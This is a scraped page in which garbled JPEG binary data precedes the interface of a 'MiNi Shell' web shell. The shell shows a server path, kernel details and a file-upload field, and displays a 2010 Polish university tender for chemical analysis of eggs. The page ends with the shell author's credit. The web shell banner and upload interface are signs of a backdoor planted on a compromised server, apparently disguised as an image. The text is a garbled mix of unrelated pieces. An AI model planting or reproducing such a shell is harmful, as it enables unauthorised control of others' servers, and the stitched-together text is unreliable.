JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101117/326875-N-2010.html

<p class="kh_header"><b>Wrocław: Analizy chemiczne surowca jajczarskiego ze szczególnym uwzględnieniem niektórych witamin, aminokwasów i innych substancji RAP 150 2010</b><br>
<b>Numer ogłoszenia: 326875 - 2010; data zamieszczenia: 17.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy we Wrocławiu , ul. C.K. Norwida 25/27, 50-375 Wrocław, woj. dolnośląskie, tel. 071 3283576, 3205496, faks 071 3283576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.wroc.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zamawiający nie przewiduje ustanowienia DSZ</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Analizy chemiczne surowca jajczarskiego ze szczególnym uwzględnieniem niektórych witamin, aminokwasów i innych substancji RAP 150 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja Projektu w całym kompleksie łańcucha badawczego wymaga prowadzenia analiz chemicznych charakteryzujących skład chemiczny treści jaja. Szczególne istotne jest określenie składu chemicznego żółtka jaja  z uwagi na realizowany program wzbogacanie jaj. Część analiz jest wykonywana we własnych laboratoriach, część zaś musi być wykonana na zewnątrz ze względu na brak odpowiednich metod analitycznych w jednostce macierzystej.
W wyniku prowadzonych analiz w surowcu można dokonywać korekt w procedurach żywieniowych dla niosek w celu doskonalenia tego surowca, co jest kluczowym celem całego Projektu. Zatem przyjęty program analiz wybranych substancji organicznych jest niezbędny do realizacji i osiągnięcia celów niniejszego Projektu. Poniżej przedstawiono niezbędne analizy, które muszą być wykonane w przedmiotowym Projekcie.

Przedmiot zamówienia w ramach przetargu nieograniczonego:
Przedmiotem zamówienia jest oznaczenie wybranych związków organicznych treści jaj (białko, żółtko) w dwóch powtórzeniach, uwzględniając 60 analiz dla każdej substancji/ grup substancji, w tym:
- zawartość witaminy: A (retinolu); 
- zawartość witaminy E: a-tokotrienol, y-tokotrienol oraz a-tokoferol, -tokoferol,
y-tokoferol; 
- zawartości witaminy D (D2, D3);
- zawartości witaminy K (K1,K2, K3);
- zawartości  witamin z grupy B, w tym witamina: B1, B2, B12.
- zawartości kwasu foliowego
- oznaczanie aminokwasów

Zakres usługi 

Przedmiotem usługi jest wykonanie analiz ww. substancji zgodnie z dobrymi praktykami laboratoryjnymi (GLP) uwzględniając następującą kolejność i zasady:
1. Odbiór materiału badawczego (jaja w skorupie) z Katedry Technologii Surowców Zwierzęcych i Zarządzania Jakością, ul. Norwida 25/27, 50-375 Wrocław oraz dostarczenie tego materiału w ciągu 12 godz. do właściwego laboratorium badawczego, z zachowaniem łańcucha chłodniczego - temp. 4°C-10°C;
2. Wykonanie w dostarczonym materiale analiz ww. związków organicznych - składników treści jaja zgodnie z obowiązującymi procedurami i najnowszymi metodami; metodą chromatograficzną GCMS, HPLC ewentualnie LCMS oraz zgodnie z obowiązującymi 
w tym zakresie normami ISO.
3. Przygotowanie i dostarczenie raportów zawierających wyniki z przeprowadzonych analiz w ciągu do 21 dni od przekazania materiału badawczego. 
4. Materiał do analiz będzie odbierany przez Wykonawcę od Zamawiającego w określonych periodach (tj. do trzech razy w kwartale) obejmujących okres badań (w latach 2010 - 2012), 

Wymagane zasady wykonywania usługi

1.	Niniejszą usługę może wykonać jedynie laboratorium respektujące dobre praktyki laboratoryjne i posiadające akredytację metody badawcze, będące przedmiotem przetargu.
2.	Jednostka wykonująca badania musi wykazać się zapleczem badawczym, umożliwiającym przeprowadzenie ww. analiz: urzadzenia do analiz chromatograficznych, w tym GCMS,HPLC,HPLC lub LCMS
3.	Oznaczenia będące przedmiotem przetargu muszą być wykonane z zastosowaniem najnowszych metod badawczych, w tym wysokosprawnej chromatografii cieczowej (HPLC) i gazowej GC
4.	Oznaczenia będące przedmiotem przetargu muszą być wykonane co najmniej  w 2 powtórzeniach.
5.	 Jednostka wykonująca analizy musi dostarczyć Raport zawierający wyniki z przeprowadzonych analiz w postaci zestawienia poszczególnych (jednostkowych) powtórzeń z danej próby oraz uśrednionych wyników tych powtórzeń, a także skróconą interpretację wyników badań.  Raport musi także zawierać opis zastosowanej metodyki badawczej, w zakresie przygotowania danej próby oraz warunków przeprowadzenia analiz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wniesienie wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie. Wykonawca złoży stosowne oświadczenie będące załacznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie. Wykonawca złoży stosowne oświadczenie będące załacznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia Wykonawca wykaże, że będzie dysponował następującymi urządzeniami: urządzenia do analiz chromatograficznych w tym GCMS, HPLC lub LCMS oraz złoży stosowne oświadczenie będące załacznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie. Wykonawca złoży stosowne oświadczenie będące załacznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowych warunków udziału w postępowaniu w tym zakresie. Wykonawca złoży stosowne oświadczenie będące załacznikiem nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy wg załącznika nr 1 do SIWZ.
Oświadczenie z art. 22 ust 1 ustawy o spełnieniu warunków udziału w postępowaniu
Ewentualne pełnomocnictwo.
W przypadku, gdy dokumenty podpisywane są przez osobę reprezentującą Wykonawcę inną niż wskazana w dokumencie rejestracyjnym przedsiębiorcy, do oferty należy dołączyć pełnomocnictwo do:reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być przedstawione w oryginale. Dopuszcza się również złożenie w ofercie kopii pełnomocnictwa notarialnie potwierdzonej za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w formie aneksu: 
a) zmiana terminu wykonania umowy z powodu uzgodnień pomiędzy Stronami dotyczącymi skróceniu terminu. Zmiana skutkuje skróceniem terminu o uzgodniony okres. 
b) zmiana terminu wykonania umowy 
c) zmiany przepisów w zakresie dotyczącym ochrony praw autorskich i własności intelektualnej. 
d) zmiana nazwy, siedziby stron umowy, numerów kont bankowych oraz innych danych identyfikacyjnych. 
e) zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy
f) zmniejszenie zakresu prac i wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia; 
g) wystąpienie omyłek pisarskich i rachunkowych w treści umowy. 
h) zmiany terminów opisanych w § 2 i §3 na podstawie uzgodnień między stronami w czasie realizacji przedmiotu umowy. 
i) gdy zmiana sposobu realizacji usługi będzie wynikać ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu umowy. 
j) zmiany stawki podatku VAT. 
k) zmiany dotyczące wprowadzenia zapisu lub informacji o przyznanym dofinansowaniu ze źródeł zewnętrznych. 
l) zmiana wysokości kwot ujętych w poszczególnych latach budżetowych realizacji zamówienia z uwagi na przesunięcia finansowe i korekty budżetu Zamawiającego, jak również w przypadku szybszego wyczerpania środków lub jego opóźnienia z wyjątkiem maksymalnej kwoty zobowiązania umownego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza-Radeckiego 6, 50-345 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2010 godzina 09:00, miejsce: Sekretariat Kanclerza Uniwersytetu Przyrodniczego we Wrocławiu, ul. Mikulicza-Radeckiego 6, 50-345 Wrocław, pok 102 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> przedmiotem zamówienia są analizy chemiczne surowca jajczarskiego ze szczególnym uwzględnieniem niektórych witamin, aminokwasów i innych substancji, niezbędnych do realizacji projektu pt: Innowacyjne technologie produkcji biopreparatów na bazie nowej generacji jaj (OVOCURA), współfinansowany  ze środków Europejskiego Funduszu Rozwoju Regionalnego realizowany w ramach Programu Operacyjnego Innowacyjna Gospodarka 2001-2013 Priorytet 1 Działanie 1.3 POIG, Poddziałanie 1.3.1, nr Projektu: POIG 01.03.01-00-133 08..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com